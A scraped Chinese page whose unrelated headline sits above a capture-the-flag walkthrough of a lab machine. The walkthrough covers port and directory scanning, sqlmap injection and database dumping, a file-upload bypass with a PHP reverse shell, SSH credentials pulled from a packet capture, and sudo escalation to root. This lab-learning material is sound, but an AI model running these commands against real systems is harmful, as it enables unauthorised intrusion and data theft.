当前位置: 首页 > news >正文

网站图片alt属性设置wordpress花瓣网

网站图片alt属性设置,wordpress花瓣网,做问卷用哪个网站,wordpress oss 内网一、信息收集 1、主机发现 nmap 192.168.236.0/24 2、端口扫描 nmap 192.168.236.173 -p- -A 3、目录扫描 dirb http://192.168.236.173 二、漏洞探测 访问80端口 访问 /nt4stopc/ 下面有一些问题#xff0c;提示必须收集答案 都是一些判断题#xff0c;对与错对应1与0提示必须收集答案 都是一些判断题对与错对应1与0最后结果为 0110111001 拼接访问 点击图中位置发现url中存在参数可能存在注入 直接用sqlmap跑一下 python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch 库名 python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch --dbs tatil 库下的表名 python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch -D tatil --tables gereksiz 表下得到一串值 python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch -D tatil -T gereksiz --dumphihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php 解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas 可能是路径拼接访问 再拼接 /upload.php 文件上传以md5提交但是没有提交按钮自己在前端加一个 input typesubmit 三、GetShell kali 反弹shell locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php 上传该文件后返回了文件路径文件名为md5加密后的 osas/2ad6bded962b884337eaeb921d7c2764.php 浏览器访问kali 成功反弹到shell http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php 四、提权 使用python提高交互性 python3 -c import pty;pty.spawn(/bin/bash) 在 /var/www/html 下发现 important.pcapng 查看文件内容发现 emailmkelepcemessageHellothere%2CThepasswordfortheSSHaccountyouwantis%3Amkelepce%3Amklpc-osas112.Ifyouencounteraproblem%2Cjustmailit.Goodwork url解码得到以下数据 emailmkelepcemessageHello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work 账号密码 mkelepce:mklpc-osas112. ssh连接 ssh mkelepce192.168.236.173 查看具有root权限的命令 sudo -l 显示为 all 直接 sudo su 提权提权成功 sudo su 查看flag
http://www.laogonggong.com/news/104248.html

相关文章:

  • wordpress网站标题优化wordpress营业中
  • js网站模板怎么用google seo
  • wap建站logo设计免费平台
  • 做网站成都哪家公司最好绘图软件有哪些
  • 邙山郑州网站建设门户网站建设方案的公司
  • 建设悦生活网站一个虚拟空间可以放几个网站
  • 做电影网站教程新闻30分
  • 腾讯网静态网站建设北京展厅展馆设计公司
  • 企业网站html源代码网站提现功能怎么做
  • 吕梁网站定制长沙人才招聘网最新招聘2024
  • 商业网站建设案例课程 下载游戏行业seo整站优化
  • 创个网站怎么弄网页设计亮点介绍和心得体会
  • 网站模板编号网站建设友情链接怎样交换
  • wordpress资源下载模板seo实战密码读后感
  • 深汕特别合作区属于深圳吗广州营销优化
  • 建设网站网站名长沙专业竞价优化公司
  • 安装网站时出现dir网页游戏排行榜图标
  • 山东网站备案公司厦门网站建设公司哪个好
  • 571免费建网站如何做网站路径分析
  • 山东高阳建设公司网站网页设计师工作职责
  • 做网站一定要后台嘛没有网站可以做域名解析吗
  • 烽火台网站网站信息更新如何做
  • 北京城乡建设集团网站wordpress数据库配置页面
  • 临海大经建设集团网站起飞页自助建站平台
  • 网站自助建设平台房屋平面设计图软件
  • 电影网站开发视频热门国际新闻
  • django 开放api 做网站广告公司资质
  • 贵阳网站优化排名网上推广平台 怎么入手
  • 网站内容页显示不出来友情链接可以帮助店铺提高浏览量
  • ssl 加密网站网站没有索引量是什么